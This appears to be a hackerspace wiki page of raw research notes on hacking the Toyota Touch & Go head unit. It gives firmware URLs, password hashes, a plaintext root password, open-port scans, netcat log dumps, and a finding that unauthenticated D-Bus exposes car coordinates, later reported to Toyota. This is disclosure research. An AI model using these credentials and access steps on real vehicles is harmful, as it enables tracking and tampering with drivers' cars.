hacker turmio hacker ms hacker wilho started 2012-03-05 12:33:07

Presentation slides from 2012: HappyHackingToyotaTouchAndGo.pdf

Hacking Toyota Touch & Go

New Toyotas can be connected to the Internet via bluetooth. We wanted to know what is going on under the hood. You can find our raw notes from here. These are our raw notes for fellow hackers to continue the work.



Yes. We found similar vulnerabilities as in famous Jeep #CarHack by Charlie Miller and Chris Valasek found. You can find their great research from here: http://illmatics.com/Remote%20Car%20Hacking.pdf

Instructions from mytoyota.com

Free and paid content can be added to your account on the download services section of this portal. To ensure you install the content correctly onto your Toyota Touch & Go follow the steps below: Create a fingerprint of your Toyota Touch & Go using your USB stick (see guide) Download and install the Toyota Touch & Go Toolbox on your PC (download page) Connect the USB stick to your PC and launch your toolbox Login to your Toyota Touch & Go Toolbox and follow the instructions to download and install your content (see guide)

There is devel documentation about the qnx platform..

e.g.

Firmware

Firmware http://download.naviextras.com/content/!application/Toyota/OS/EU_Low/2011_12_08/swdl.iso

/usr/share/swdl.bin looks interesting Strings findings:

root:C9v0PdmoRiQ9.:1303406650 toyota:QQkI3zYSmefdc

$ file usr/share/V850/teb.bin us/share/V850/teb.bin: 8086 relocatable (Microsoft)

usr/share/scripts/install.sh

QNX CAR Application Platform http://www.qnx.com/products/qnxcar/

Open services on QNX machine

23/tcp open telnet Openwall GNU/*/Linux telnetd

851/tcp open unknown

2021/tcp open servexec?

6020/tcp open unknown

6667/tcp open irc?

51500/tcp opn ????

/Nmap-run

23 telnet

$ telnet 172.20.10.6 Trying 172.20.10.6... Connected to 172.20.10.6. Escape character is '^]'. QNX Neutrino (localhost) (ttyp0) login:

Accounts are now publicly known. Harman were kind to share account information to everybody on their scrum wiki.

login: root password: Mc!AsR3

851 Logdump?

{{ $ nc 192.168.2.6 851 åGåLåLMar 18 14:56:00.050 5 00008 300 io-winmgr: starting up... Mar 18 14:56:00.177 5 10000 00 Service com.harman.service.ToyotaMGR just appeared at time 7.200323 seconds Mar 18 14:56:00.276 5 00008 300 io-winmgr: attached to iow-keyboard Mar 18 14:56:00.335 5 10000 00 pid 340019: Binary persistence for 'TM' is empty. Mar 18 14:56:00.500 5 00008 300 io-winmgr: no mouse Mar 18 14:56:00.507 5 00008 300 io-winmgr: attached to iow-touch Mar 18 14:56:00.697 5 00008 300 io-winmgr: no control Mar 18 14:56:00.840 5 10000 00 pid 458795: Binary persistence for 'HMI' is empty.

/Port-851-dump

/InsertingUSBKeyboard

/FromLogUSBStickWithFancyFiles

/LogAfterBoot

2021

$ nc 172.20.10.6 2021 <GCF 000163 TS_10_0001081726>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, trk_total: 27, skipped: 2'; <GCF 000163 TS_10_0001082328>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, trk_total: 27, skipped: 2'; <GCF 000082 TS_10_0001082381>CALL Bluephone:507 BSS_HFP_Write handle=1 codec=CODEC_HEX data='41542B434C43430D'; <GCF 000055 TS_10_0001082382>CTRL INFO BSSService MSG='received event ET_DATA_SENT'; <GCF 000056 TS_10_0001082383>RESP Bluephone:507 BSS_HFP_Write error=WRITE_ERROR_NONE; <GCF 000059 TS_10_0001082417>CTRL INFO BSSService MSG='received event ET_DATA_RECEIVED';

/Port-2021-example

6020

$ nc 192.168.2.6 6020 :CTRL CNFG GCFROUTER MODE=STANDARD;

It might be serial port to GPS navigation device http://www.digital-eliteboard.com/showthread.php?88164-Supportthread_1-Becker-Z099-Z1XX-Z2XX-Z302/page52&p=953416&viewfull=1#post953416

6667

If I connect to this port with telnet it will say: ERROR "Unknown command"

e.g:

$ telnet 192.168.2.4 6667 Trying 192.168.2.4... Connected to 192.168.2.4. Escape character is '^]'. foo ERROR "Unknown command"

with nc there is nothing.

Clues

Migth be d-bus related:

unix:path=/tmp/dbus-MNzOp3X3nV,guid=e21d288fe52bc59a6d8e19c04bbccfd0;tcp:host=localhost,port=6667,family=ipv4,guid= 1b1a12b5fa8e657b3fd2d05b4bbccfd0

http://community.qnx.com/sf/discussion/do/listPosts/projects.ide/discussion.ide.topc13034

Bug reporter was: Glenn Schmottlach

He have done before: D-Bus Platform Support - Ported and adapted D-Bus to QNX where it serves as the primary application IPC mechanism for mid-tier head unit designs. Includes developing an alternative JSON based messaging protocol on top of D-Bus. http://www.linkedin.com/pub/glenn-schmottlach/4/396/a5

http://dbus.freedesktop.org/doc/dbus-specification.html#transports-exec

D-bus tests

DBus-trips

/VulncoordReport

Updated 2014-12 So.. it really was Dbus without any kind of authentication. You can get car coordinates, play any flash from the Internet on the screen etc. You really want to keep your car disconnected from the Internet. We have reported this to Toyota (2013-02) and they kindly answered (2013-05).

51500

After I say something to socket connection will close

Bluetooth

Services: AVRCP Remote Contro Advanced Audio Hands-Free unit Personal Ad-hoc User Service

Device Service Class 0x3b0

/BluetoothServiceDump

Key validation

# cat apps-eu.pub -----BEGIN PUBLIC KEY----- MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ== -----END PUBLIC KEY----- % openssl rsa -pubin -in ./fuu.pub -text Modulus (512 bit): 00:b8:fd:29:5f:65:ff:07:66:0f:9b:3d:65:4a:d3: 59:4a:4a:e8:68:fc:3b:11:63:77:b1:2b:39:fb:f3: fb:ad:ec:f2:42:3d:58:fb:d4:dc:81:61:b4:74:19: 29:d9:fc:6a:b6:3a:0f:6b:fd:2f:33:95:fa:4d:af: fe:df:36:ec:53 Exponent: 65537 (0x10001) writing RSA key -----BEGIN PUBLIC KEY----- MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ== -----END PUBLIC KEY-----

firmware update

http://download.naviextras.com/content/!application/Toyota/OS/EU_Low/2011_12_08/swdl.iso

http://www.vleeuwen.net/

http://www.itviikko.fi/uutiset/2012/03/06/fordin-vastaus-ongelmiin-muistitikku/201224651/7

http://www.harman.com/EN-US/Newscenter/Pages/HARMANdeliversTouchGoupgradeablemultimediasystemforToyotaEuropeanvehicles.aspx#.T6BCtI4beHkhttp://

description Hacking Head Unit of Toyota Avensis (Toyota model in Europe)

CategoryProjekti